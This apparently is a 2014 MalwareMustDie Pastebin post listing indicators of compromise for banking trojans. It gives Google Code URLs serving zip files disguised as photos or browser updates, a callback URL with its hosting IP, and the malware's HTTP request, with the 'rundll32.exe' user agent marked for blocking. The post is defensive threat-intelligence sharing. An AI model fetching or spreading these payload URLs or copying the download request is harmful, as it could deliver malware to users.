daily pastebin goal
67%
SHARE
TWEET

Trojan bankings served in Google Code

MalwareMustDie Mar 16th, 2014 803 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie! $ date
  2. Mon Mar 17 05:32:01 JST 2014
  3. // Trojan bankings served in Google Code:
  4.  
  5. foto-0176.googlecode.com/svn/FOTO-0176.zip
  6. fotos-camera.googlecode.com/svn/FOTO-0176.zip
  7. fotos-documentos.googlecode.com/svn/FOTO001.zip
  8. fotos-documentos2012.googlecode.com/svn/FOTO99.zip
  9. fotos-novas.googlecode.com/svn/FOTO-71.zip
  10. meus-documentos.googlecode.com/svn/FOTO101.zip
  11. navegador-atualizado.googlecode.com/svn/Browser.zip
  12. navegador-atualizado.googlecode.com/svn/Navegador.zip
  13.  
  14. Callback: http://www.paineispanorama.com/geral/mail/leksverstel.zip
  15. In: Mon Mar 17 05:29:03 JST 2014|188.93.230.31|iberweb22a.ibername.com.|8426 | 188.93.224.0/21 | CLARANET | PT | CLARA.NET | CLARANET PORTUGAL TELECOMUNICACOES S.A.
  16.  
  17. HTTP Request:
  18. GET /geral/mail/leksverstel.zip HTTP/1.1
  19. User-Agent: rundll32.exe                        <==== to #BLOCK
  20. Host: www.paineispanorama.com
  21.  
  22. ^@unixfreaxjp $ date
  23. Mon Mar 17 05:32:01 JST 2014
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top